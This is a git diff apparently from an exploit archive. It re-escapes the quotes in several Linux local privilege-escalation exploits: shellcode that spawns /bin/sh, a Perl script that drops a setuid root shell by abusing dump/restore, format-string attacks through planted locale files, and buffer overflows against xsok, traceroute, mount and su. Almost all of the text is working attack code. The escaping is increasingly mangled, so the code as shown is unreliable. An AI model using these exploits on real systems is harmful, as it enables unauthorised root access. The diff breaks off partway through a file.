Exploit \\n\"); + printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\"); + printf(\"*********************************************\\n\\n\"); + printf(\"\\n USEAGE: ./iwconfig-exploit \\n\\n\"); return 1; } offset = 0; esp = sp(); ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; - printf("[~] S-p.ESP : 0x%x\n", esp); - printf("[~] O-F.ESP : 0x%x\n", offset); - printf("[~] Return Addr : 0x%x\n\n", ret); + printf(\"[~] S-p.ESP : 0x%x\\n\", esp); + printf(\"[~] O-F.ESP : 0x%x\\n\", offset); + printf(\"[~] Return Addr : 0x%x\\n\\n\", ret); memset(buf,0x41,sizeof(buf)); memcpy(&buf[92],&ret,4); diff --git a/platforms/linux/local/140.c b/platforms/linux/local/140.c index 470d43e6f..77569b00a 100755 --- a/platforms/linux/local/140.c +++ b/platforms/linux/local/140.c @@ -11,7 +11,7 @@ #include #include -#define BIN "/usr/games/xsok" +#define BIN \"/usr/games/xsok\" #define RETADD 0xbffffa3c #define SIZE 200 @@ -19,12 +19,12 @@ unsigned char shellcode[] = /* setregid (20,20) shellcode */ - "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" - "\xcd\x80" + \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x14\\xb1\\x14\\xb0\\x47\" + \"\\xcd\\x80\" /* exec /bin/sh shellcode */ - "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" - "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; + \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\" + \"\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"; @@ -33,8 +33,8 @@ int main (int argc, char ** argv) int i, ret = RETADD; char out[SIZE]; - fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n"); - fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n"); + fprintf(stdout, \"\\n --- 0x333xsok => xsok 1.02 local games exploit ---\\n\"); + fprintf(stdout, \" --- Outsiders Se(c)urity Labs 2003 ---\\n\\n\"); int *xsok = (int *)(out); @@ -43,7 +43,7 @@ int main (int argc, char ** argv) memset((char *)out, 0x90, 63); memcpy((char *)out+63, shellcode, strlen(shellcode)); - execl (BIN, BIN, "-xsokdir", out, 0x0); + execl (BIN, BIN, \"-xsokdir\", out, 0x0); } // milw0rm.com [2004-01-02] diff --git a/platforms/linux/local/178.c b/platforms/linux/local/178.c index 024b1ef1f..925d72b9d 100755 --- a/platforms/linux/local/178.c +++ b/platforms/linux/local/178.c @@ -2,7 +2,7 @@ * MasterSecuritY * * openwall.c - Local root exploit in LBNL traceroute - * Copyright (C) 2000 Michel "MaXX" Kaempf + * Copyright (C) 2000 Michel \"MaXX\" Kaempf * * Updated versions of this exploit and the corresponding advisory will * be made available at: @@ -32,32 +32,32 @@ #define PREV_INUSE 0x1 #define IS_MMAPPED 0x2 -char * filename = "/usr/sbin/traceroute"; +char * filename = \"/usr/sbin/traceroute\"; unsigned int stack = 0xc0000000 - 4; unsigned int p = 0x0804ce38; unsigned int victim = 0x0804c88c; -char * jmp = "\xeb\x0aXXYYYYZZZZ"; +char * jmp = \"\\xeb\\x0aXXYYYYZZZZ\"; char * shellcode = /* : xor %edx,%edx */ - "\x31\xd2" + \"\\x31\\xd2\" /* : mov %edx,%eax */ - "\x89\xd0" + \"\\x89\\xd0\" /* : mov $0xb,%al */ - "\xb0\x0b" + \"\\xb0\\x0b\" /* : mov $XXXX,%ebx */ - "\xbbXXXX" + \"\\xbbXXXX\" /* : mov $XXXX,%ecx */ - "\xb9XXXX" + \"\\xb9XXXX\" /* : mov %ebx,(%ecx) */ - "\x89\x19" + \"\\x89\\x19\" /* : mov %edx,0x4(%ecx) */ - "\x89\x51\x04" + \"\\x89\\x51\\x04\" /* : int $0x80 */ - "\xcd\x80"; + \"\\xcd\\x80\"; -char * program = "/bin/sh"; +char * program = \"/bin/sh\"; int zero( unsigned int ui ) { @@ -71,29 +71,29 @@ int main() { char gateway[ 1337 ]; char host[ 1337 ]; - char * argv[] = { filename, "-g", "123", "-g", gateway, host, NULL }; + char * argv[] = { filename, \"-g\", \"123\", \"-g\", gateway, host, NULL }; unsigned int next; int i; unsigned int hellcode; unsigned int size; - strcpy( host, "AAAABBBBCCCCDDDDEEEE" ); - next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA"); + strcpy( host, \"AAAABBBBCCCCDDDDEEEE\" ); + next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen(\"AAAA\"); for ( i = 0; i < next - (next & ~3); i++ ) { - strcat( host, "X" ); + strcat( host, \"X\" ); } next = next & ~3; ((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE; ((unsigned int *)host)[2] = 0xffffffff; if ( zero( victim - 12 ) ) { - fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 ); + fprintf( stderr, \"Null byte(s) in `victim - 12\' (0x%08x)!\\n\", victim - 12 ); return( -1 ); } ((unsigned int *)host)[3] = victim - 12; - hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" "); + hellcode = p + (strlen(\"123\") + 1) + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \"); if ( zero( hellcode ) ) { - fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode ); + fprintf( stderr, \"Null byte(s) in `host\' (0x%08x)!\\n\", hellcode ); return( -1 ); } ((unsigned int *)host)[4] = hellcode; @@ -102,31 +102,31 @@ int main() size = size | PREV_INUSE; sprintf( gateway, - "0x%02x.0x%02x.0x%02x.0x%02x", + \"0x%02x.0x%02x.0x%02x.0x%02x\", ((unsigned char *)(&size))[0], ((unsigned char *)(&size))[1], ((unsigned char *)(&size))[2], ((unsigned char *)(&size))[3] ); - strcat( gateway, " " ); + strcat( gateway, \" \" ); strcat( gateway, jmp ); strcat( gateway, shellcode ); strcat( gateway, program ); hellcode += strlen(jmp) + strlen(shellcode); if ( zero( hellcode ) ) { - fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode ); + fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode ); return( -1 ); } - *((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode; + *((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 7)) = hellcode; hellcode += strlen(program) + 1; if ( zero( hellcode ) ) { - fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode ); + fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode ); return( -1 ); } - *((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode; + *((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 12)) = hellcode; execve( argv[0], argv, NULL ); return( -1 ); diff --git a/platforms/linux/local/184.pl b/platforms/linux/local/184.pl index 7b13f7d55..a0b44cb3c 100755 --- a/platforms/linux/local/184.pl +++ b/platforms/linux/local/184.pl @@ -5,134 +5,134 @@ # written by tlabs # Use at your discretion -$EXPORT1="TAPE=garbage:garbage" ; -$EXPORT2="RSH=./hey" ; +$EXPORT1=\"TAPE=garbage:garbage\" ; +$EXPORT2=\"RSH=./hey\" ; sub USAGE { - print "$0 \n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ; + print \"$0 \\n1=dump 2=dump.static 3=restore 4=restore.staic\\nYour choice innit;)\\nWritten by Tlabs\\n\" ; exit 0 ; } sub ERROR { - print "$_[0]\n" ; + print \"$_[0]\\n\" ; exit 0 ; } -open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!"); -printf TEMP "#include\n#include\nint main()\n{" ; -printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ; +open(TEMP, \">shell.c\")|| ERROR(\"Something went wrong:$!\"); +printf TEMP \"#include\\n#include\\nint main()\\n{\" ; +printf TEMP \" setuid(0);\\n\\tsetgid(0);\\n\\texecl(\\\"/bin/sh\\\",\\\"sh\\\",0);\\n\\treturn 0;\\n}\" ; close(TEMP); -system "cc -o shell shell.c" ; -unlink "shell.c" ; -open(TEMP1, ">hey")|| ERROR("Something went wrong: $!"); -printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ; +system \"cc -o shell shell.c\" ; +unlink \"shell.c\" ; +open(TEMP1, \">hey\")|| ERROR(\"Something went wrong: $!\"); +printf TEMP1 \"#!/bin/sh\\nchown root shell\\nchmod 4755 shell\" ; close(TEMP1); -chmod(0755, "hey"); +chmod(0755, \"hey\"); -if ($ARGV[$0] eq "1") +if ($ARGV[$0] eq \"1\") { - $DUMPER="/sbin/dump" ; - if ( -u "$DUMPER" ) + $DUMPER=\"/sbin/dump\" ; + if ( -u \"$DUMPER\" ) { - system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; + system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ; sleep(3); - if ( -u "shell" ) + if ( -u \"shell\" ) { - unlink "hey" ; - system "./shell" ; + unlink \"hey\" ; + system \"./shell\" ; } else { - unlink "hey" ; - unlink "shell" ; - print "Something fucked at the last, sorry" ; + unlink \"hey\" ; + unlink \"shell\" ; + print \"Something fucked at the last, sorry\" ; } } else { - unlink "hey" ; - unlink "shell" ; - printf "Dump is not exploitable on this system\n"; + unlink \"hey\" ; + unlink \"shell\" ; + printf \"Dump is not exploitable on this system\\n\"; } } -elsif ($ARGV[$0] eq "2") +elsif ($ARGV[$0] eq \"2\") { - $DUMPER="/sbin/dump.static" ; - if ( -u "$DUMPER" ) + $DUMPER=\"/sbin/dump.static\" ; + if ( -u \"$DUMPER\" ) { - system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; + system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ; sleep(3); - if ( -u "shell" ) + if ( -u \"shell\" ) { - unlink "hey" ; - system "./shell" ; + unlink \"hey\" ; + system \"./shell\" ; } else { - unlink "hey" ; - unlink "shell" ; - print "Something fucked at the last, sorry" ; + unlink \"hey\" ; + unlink \"shell\" ; + print \"Something fucked at the last, sorry\" ; } } else { - unlink "hey" ; - unlink "shell" ; - printf "Dump.static is not exploitable on this system\n"; + unlink \"hey\" ; + unlink \"shell\" ; + printf \"Dump.static is not exploitable on this system\\n\"; } } -elsif ($ARGV[$0] eq "3") +elsif ($ARGV[$0] eq \"3\") { - $RESTORER="/sbin/restore" ; - if ( -u "$RESTORER" ) + $RESTORER=\"/sbin/restore\" ; + if ( -u \"$RESTORER\" ) { - system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; + system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ; sleep(3); - if ( -u "shell" ) + if ( -u \"shell\" ) { - unlink "hey" ; - system "./shell" ; + unlink \"hey\" ; + system \"./shell\" ; } else { - unlink "hey" ; - unlink "shell" ; - print "Something fucked at the last, sorry" ; + unlink \"hey\" ; + unlink \"shell\" ; + print \"Something fucked at the last, sorry\" ; } } else { - unlink "hey" ; - unlink "shell" ; - printf "Restore is not exploitable on this system\n"; + unlink \"hey\" ; + unlink \"shell\" ; + printf \"Restore is not exploitable on this system\\n\"; } } -elsif ($ARGV[$0] eq "4") +elsif ($ARGV[$0] eq \"4\") { - $RESTORER="/sbin/restore.static" ; - if ( -u "$RESTORER" ) + $RESTORER=\"/sbin/restore.static\" ; + if ( -u \"$RESTORER\" ) { - system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; + system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ; sleep(3); - if ( -u "shell" ) + if ( -u \"shell\" ) { - unlink "hey" ; - system "./shell" ; + unlink \"hey\" ; + system \"./shell\" ; } else { - unlink "hey" ; - unlink "shell" ; - print "Something fucked at the last, sorry" ; + unlink \"hey\" ; + unlink \"shell\" ; + print \"Something fucked at the last, sorry\" ; } } else { - unlink "hey" ; - unlink "shell" ; - printf "Restore.static is not exploitable on this system\n"; + unlink \"hey\" ; + unlink \"shell\" ; + printf \"Restore.static is not exploitable on this system\\n\"; } } else diff --git a/platforms/linux/local/20185.c b/platforms/linux/local/20185.c index c23a9b6c7..6cd7c5920 100755 --- a/platforms/linux/local/20185.c +++ b/platforms/linux/local/20185.c @@ -43,16 +43,16 @@ It should be noted under Linux this problem must be exploited in conjunction wit #define DEFAULT_BUFFER_SIZE 2048 #define DEFAULT_EGG_SIZE 1024 #define NOP 0x90 -#define PATH "/tmp/LC_MESSAGES" +#define PATH \\\"/tmp/LC_MESSAGES\\\" char shellcode[] = - "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" - "\x80\xe8\xdc\xff\xff\xff/bin/sh"; + \\\"\\\\xeb\\\\x1f\\\\x5e\\\\x89\\\\x76\\\\x08\\\\x31\\\\xc0\\\\x88\\\\x46\\\\x07\\\\x89\\\\x46\\\\x0c\\\\xb0\\\\x0b\\\" + \\\"\\\\x89\\\\xf3\\\\x8d\\\\x4e\\\\x08\\\\x8d\\\\x56\\\\x0c\\\\xcd\\\\x80\\\\x31\\\\xdb\\\\x89\\\\xd8\\\\x40\\\\xcd\\\" + \\\"\\\\x80\\\\xe8\\\\xdc\\\\xff\\\\xff\\\\xff/bin/sh\\\"; unsigned long get_esp(void) { - __asm__("movl %esp,%eax"); + __asm__(\\\"movl %esp,%eax\\\"); } @@ -65,7 +65,7 @@ unsigned long get_esp(void) { int i,reth,retl,num=113; FILE *fp; - if (argc > 1) sscanf(argv[1],"%x",&retloc); + if (argc > 1) sscanf(argv[1],\\\"%x\\\",&retloc); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) num = atoi(argv[3]); if (argc > 4) align = atoi(argv[4]); @@ -74,27 +74,27 @@ unsigned long get_esp(void) { - printf("Usages: %s \n",argv[0]); + printf(\\\"Usages: %s \\\\n\\\",argv[0]); if (!(buff = malloc(eggsize))) { - printf("Can't allocate memory.\n"); + printf(\\\"Can\\\'t allocate memory.\\\\n\\\"); exit(0); } if (!(buff1 = malloc(bsize))) { - printf("Can't allocate memory.\n"); + printf(\\\"Can\\\'t allocate memory.\\\\n\\\"); exit(0); } if (!(egg = malloc(eggsize))) { - printf("Can't allocate memory.\n"); + printf(\\\"Can\\\'t allocate memory.\\\\n\\\"); exit(0); } - printf("Using RET location address: 0x%x\n", retloc); + printf(\\\"Using RET location address: 0x%x\\\\n\\\", retloc); shell_addr = get_esp() + offset; - printf("Using Shellcode address: 0x%x\n", shell_addr); + printf(\\\"Using Shellcode address: 0x%x\\\\n\\\", shell_addr); reth = (shell_addr >> 16) & 0xffff ; retl = (shell_addr >> 0) & 0xffff ; @@ -102,7 +102,7 @@ unsigned long get_esp(void) { ptr = buff; for (i = 0; i <2 ; i++, retloc+=2 ){ - memset(ptr,'A',4); + memset(ptr,\\\'A\\\',4); ptr += 4 ; (*ptr++) = retloc & 0xff; (*ptr++) = (retloc >> 8 ) & 0xff ; @@ -110,27 +110,27 @@ unsigned long get_esp(void) { (*ptr++) = (retloc >> 24 ) & 0xff ; } - memset(ptr,'A',align); + memset(ptr,\\\'A\\\',align); ptr = buff1; for(i = 0 ; i < num ; i++ ) { - memcpy(ptr, "%.8x", 4); + memcpy(ptr, \\\"%.8x\\\", 4); ptr += 4; } - sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8), + sprintf(ptr, \\\"%%%uc%%hn%%%uc%%hn\\\",(retl - num*8), (0x10000 + reth - retl)); mkdir(PATH,0755); chdir(PATH); - fp = fopen("libc.po", "w+"); - fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); - fprintf(fp,"msgstr \"%s\\n\"", buff1); + fp = fopen(\\\"libc.po\\\", \\\"w+\\\"); + fprintf(fp,\\\"msgid \\\\\\\"%%s: invalid option -- %%c\\\\\\\\n\\\\\\\"\\\\n\\\"); + fprintf(fp,\\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buff1); fclose(fp); - system("/usr/bin/msgfmt libc.po -o libc.mo"); + system(\\\"/usr/bin/msgfmt libc.po -o libc.mo\\\"); ptr = egg; @@ -140,13 +140,13 @@ unsigned long get_esp(void) { for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; - egg[eggsize - 1] = '\0'; + egg[eggsize - 1] = \\\'\\\\0\\\'; - memcpy(egg, "EGG=", 4); + memcpy(egg, \\\"EGG=\\\", 4); env[0] = egg ; - env[1] = "LANGUAGE=sk_SK/../../../../../../tmp"; + env[1] = \\\"LANGUAGE=sk_SK/../../../../../../tmp\\\"; env[2] = (char *)0 ; - execle("/bin/su","su","-u", buff, NULL,env); + execle(\\\"/bin/su\\\",\\\"su\\\",\\\"-u\\\", buff, NULL,env); } /* end of main */ \ No newline at end of file diff --git a/platforms/linux/local/215.c b/platforms/linux/local/215.c index a4bcbb767..0670b0644 100755 --- a/platforms/linux/local/215.c +++ b/platforms/linux/local/215.c @@ -6,7 +6,7 @@ * Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112 * compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112 * - * "objdump /bin/mount | grep exit" to get the -a address + * \\\"objdump /bin/mount | grep exit\\\" to get the -a address * * - sk8 */ @@ -17,32 +17,32 @@ char sc[]= /* main: */ /* setreuid(0, 0); */ - "\x29\xc0" /* subl %eax, %eax */ - "\xb0\x46" /* movb $70, %al */ - "\x29\xdb" /* subl %ebx, %ebx */ - "\xb3\x0c" /* movb $12, %bl */ - "\x80\xeb\x0c" /* subb $12, %bl */ - "\x89\xd9" /* movl %ebx, %ecx */ - "\xcd\x80" /* int $0x80 */ - "\xeb\x18" /* jmp callz */ + \\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */ + \\\"\\\\xb0\\\\x46\\\" /* movb $70, %al */ + \\\"\\\\x29\\\\xdb\\\" /* subl %ebx, %ebx */ + \\\"\\\\xb3\\\\x0c\\\" /* movb $12, %bl */ + \\\"\\\\x80\\\\xeb\\\\x0c\\\" /* subb $12, %bl */ + \\\"\\\\x89\\\\xd9\\\" /* movl %ebx, %ecx */ + \\\"\\\\xcd\\\\x80\\\" /* int $0x80 */ + \\\"\\\\xeb\\\\x18\\\" /* jmp callz */ /* start: */ /* execve of /bin/sh */ - "\x5e" /* popl %esi */ - "\x29\xc0" /* subl %eax, %eax */ - "\x88\x46\x07" /* movb %al, 0x07(%esi) */ - "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ - "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ - "\xb0\x0b" /* movb $0x0b, %al */ - "\x87\xf3" /* xchgl %esi, %ebx */ - "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ - "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ - "\xcd\x80" /* int $0x80 */ + \\\"\\\\x5e\\\" /* popl %esi */ + \\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */ + \\\"\\\\x88\\\\x46\\\\x07\\\" /* movb %al, 0x07(%esi) */ + \\\"\\\\x89\\\\x46\\\\x0c\\\" /* movl %eax, 0x0c(%esi) */ + \\\"\\\\x89\\\\x76\\\\x08\\\" /* movl %esi, 0x08(%esi) */ + \\\"\\\\xb0\\\\x0b\\\" /* movb $0x0b, %al */ + \\\"\\\\x87\\\\xf3\\\" /* xchgl %esi, %ebx */ + \\\"\\\\x8d\\\\x4b\\\\x08\\\" /* leal 0x08(%ebx), %ecx */ + \\\"\\\\x8d\\\\x53\\\\x0c\\\" /* leal 0x0c(%ebx), %edx */ + \\\"\\\\xcd\\\\x80\\\" /* int $0x80 */ /* callz: */ - "\xe8\xe3\xff\xff\xff" /* call start */ + \\\"\\\\xe8\\\\xe3\\\\xff\\\\xff\\\\xff\\\" /* call start */ /* /bin/sh */ - "\x2f\x62\x69\x6e\x2f\x73\x68"; + \\\"\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\"; int main(int argc, char** argv) { FILE* fp; @@ -50,7 +50,7 @@ int main(int argc, char** argv) { char buffer[20000], fmtbuf[1000], numbuf[2000]; int shloc=0xbfffdaa0; int i=0, c=0; - char mode='n'; + char mode=\\\'n\\\'; int debug=0; int eiploc=0xbffffdc0; char* envbuf[2]; @@ -65,20 +65,20 @@ int main(int argc, char** argv) { memset(buffer, 0, sizeof(buffer)); memset(fmtbuf, 0, sizeof(fmtbuf)); memset(numbuf, 0, sizeof(numbuf)); - printf("heapaddr: 0x%x\n", heapaddr); + printf(\\\"heapaddr: 0x%x\\\\n\\\", heapaddr); c=0; - strcpy (xpath, "/bin/mount"); + strcpy (xpath, \\\"/bin/mount\\\"); - while ((s=getopt(argc, argv, "p:s:b:e:a:n:i:d")) != EOF) { + while ((s=getopt(argc, argv, \\\"p:s:b:e:a:n:i:d\\\")) != EOF) { switch(s) { - case 's': shloc=strtoul(optarg, 0, 0); break; - case 'b': bpad=atoi(optarg); break; - case 'e': epad=atoi(optarg); break; - case 'a': eiploc=strtoul(optarg, 0, 0); break; - case 'n': nump=atoi(optarg); break; - case 'i': inc=atoi(optarg); break; - case 'p': strcpy(xpath, optarg); break; - case 'd': debug=1; break; + case \\\'s\\\': shloc=strtoul(optarg, 0, 0); break; + case \\\'b\\\': bpad=atoi(optarg); break; + case \\\'e\\\': epad=atoi(optarg); break; + case \\\'a\\\': eiploc=strtoul(optarg, 0, 0); break; + case \\\'n\\\': nump=atoi(optarg); break; + case \\\'i\\\': inc=atoi(optarg); break; + case \\\'p\\\': strcpy(xpath, optarg); break; + case \\\'d\\\': debug=1; break; default: } } @@ -87,16 +87,16 @@ int main(int argc, char** argv) { if (epad < 0) epad+=16; for (i=0; i < nump; i++) { - buffer[c++]='%'; - buffer[c++]='8'; - buffer[c++]='x'; + buffer[c++]=\\\'%\\\'; + buffer[c++]=\\\'8\\\'; + buffer[c++]=\\\'x\\\'; } - if (debug) { mode='p'; - strcpy(sc, "AAAA"); + if (debug) { mode=\\\'p\\\'; + strcpy(sc, \\\"AAAA\\\"); numnops=0; } - printf("cur strlen: %i\n", strlen(buffer)); + printf(\\\"cur strlen: %i\\\\n\\\", strlen(buffer)); /* size of executed program (/bin/mount) does not seem to affect these calculations it does affect location of eip however, (which is why its nice to just overwrite exit @@ -111,58 +111,58 @@ int main(int argc, char** argv) { num[3]=((shloc >> 24) & 0xff)+1; if (num[3] < 0) num[3]+=256; - sprintf(fmtbuf, "%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c", num[0] + sprintf(fmtbuf, \\\"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\\\", num[0] , mode, num[1], mode, num[2], mode, num[3], mode); - printf("fmtbuf: %s\n", fmtbuf); - printf("strlen(fmtbuf): %i\n", strlen(fmtbuf)); + printf(\\\"fmtbuf: %s\\\\n\\\", fmtbuf); + printf(\\\"strlen(fmtbuf): %i\\\\n\\\", strlen(fmtbuf)); memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf)); memset(buffer+strlen(buffer), 0x90, numnops); memcpy(buffer+strlen(buffer), sc, strlen(sc)); - mkdir("/tmp/sk8", 0755); - mkdir("/tmp/sk8/LC_MESSAGES", 0755); - if ( ! (fp=fopen("/tmp/sk8/LC_MESSAGES/libc.po", "w") ) ) { - printf("could not create bad libc.po\n"); + mkdir(\\\"/tmp/sk8\\\", 0755); + mkdir(\\\"/tmp/sk8/LC_MESSAGES\\\", 0755); + if ( ! (fp=fopen(\\\"/tmp/sk8/LC_MESSAGES/libc.po\\\", \\\"w\\\") ) ) { + printf(\\\"could not create bad libc.po\\\\n\\\"); exit(-1); } - fprintf(fp, "msgid \"%%s: unrecognized option `--%%s'\\n\"\n"); - fprintf(fp, "msgstr \"%s\\n\"", buffer); + fprintf(fp, \\\"msgid \\\\\\\"%%s: unrecognized option `--%%s\\\'\\\\\\\\n\\\\\\\"\\\\n\\\"); + fprintf(fp, \\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buffer); fclose(fp); - system("msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo"); + system(\\\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\\\"); c=0; - numbuf[c++]='-'; - numbuf[c++]='-'; + numbuf[c++]=\\\'-\\\'; + numbuf[c++]=\\\'-\\\'; - memset(numbuf+strlen(numbuf), 'B', bpad); + memset(numbuf+strlen(numbuf), \\\'B\\\', bpad); - memcpy(numbuf+strlen(numbuf), "PPPP", 4); + memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); *(long*)(numbuf+strlen(numbuf))=eiploc; - memcpy(numbuf+strlen(numbuf), "PPPP", 4); + memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); *(long*)(numbuf+strlen(numbuf))=eiploc+1; - memcpy(numbuf+strlen(numbuf), "PPPP", 4); + memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); *(long*)(numbuf+strlen(numbuf))=eiploc+2; - memcpy(numbuf+strlen(numbuf), "PPPP", 4); + memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4); *(long*)(numbuf+strlen(numbuf))=eiploc+3; - printf("cur numbuf length: %i\n", strlen(numbuf)); - memset(numbuf+strlen(numbuf), 'Z', epad); - printf("cur numbuf length: %i\n", strlen(numbuf)); + printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf)); + memset(numbuf+strlen(numbuf), \\\'Z\\\', epad); + printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf)); - envbuf[0]="LANGUAGE=en_GB/../../../../tmp/sk8/"; + envbuf[0]=\\\"LANGUAGE=en_GB/../../../../tmp/sk8/\\\"; envbuf[1]=0; - printf("strlen(numbuf): %i\n", strlen(numbuf)); - printf("bpad: %i; epad: %i\n", bpad, epad); - printf("number of %%p's to traverse stack: %i\n", nump); - printf("address of eip: 0x%x\n", eiploc); - printf("inc: %i\n", inc); + printf(\\\"strlen(numbuf): %i\\\\n\\\", strlen(numbuf)); + printf(\\\"bpad: %i; epad: %i\\\\n\\\", bpad, epad); + printf(\\\"number of %%p\\\'s to traverse stack: %i\\\\n\\\", nump); + printf(\\\"address of eip: 0x%x\\\\n\\\", eiploc); + printf(\\\"inc: %i\\\\n\\\", inc); - execle(xpath, "mount", numbuf, 0, envbuf); + execle(xpath, \\\"mount\\\", numbuf, 0, envbuf); } diff --git a/platforms/linux/local/229.c b/platforms/linux/local/229.c index 740ebad55..93d2d0460 100755 --- a/platforms/linux/local/229.c +++ b/platforms/linux/local/229.c @@ -7,15 +7,15 @@ #define RANGE 20 unsigned char blah[] = - "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" - "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" - "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" - "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" - "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" - "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" - "\xc2\x91"; + \"\\xeb\\x03\\x5e\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc6\\x0d\\x31\\xc9\\xb1\\x6c\\x80\\x36\\x01\\x46\\xe2\\xfa\" + \"\\xea\\x09\\x2e\\x63\\x68\\x6f\\x2e\\x72\\x69\\x01\\x80\\xed\\x66\\x2a\\x01\\x01\" + \"\\x54\\x88\\xe4\\x82\\xed\\x1d\\x56\\x57\\x52\\xe9\\x01\\x01\\x01\\x01\\x5a\\x80\\xc2\\xc7\\x11\" + \"\\x01\\x01\\x8c\\xba\\x1f\\xee\\xfe\\xfe\\xc6\\x44\\xfd\\x01\\x01\\x01\\x01\\x88\\x7c\\xf9\\xb9\" + \"\\x47\\x01\\x01\\x01\\x30\\xf7\\x30\\xc8\\x52\\x88\\xf2\\xcc\\x81\\x8c\\x4c\\xf9\\xb9\\x0a\\x01\" + \"\\x01\\x01\\x88\\xff\\x30\\xd3\\x52\\x88\\xf2\\xcc\\x81\\x30\\xc1\\x5a\\x5f\\x5e\\x88\\xed\\x5c\" + \"\\xc2\\x91\"; -long get_sp () { __asm__ ("mov %esp, %eax"); } +long get_sp () { __asm__ (\"mov %esp, %eax\"); } int main (int argc, char *argv[]) @@ -38,10 +38,10 @@ main (int argc, char *argv[]) for (i = i + strlen (blah); i < BUFSIZE; i += 4) *(long *) &buffer[i] = ret+offset; - fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); - 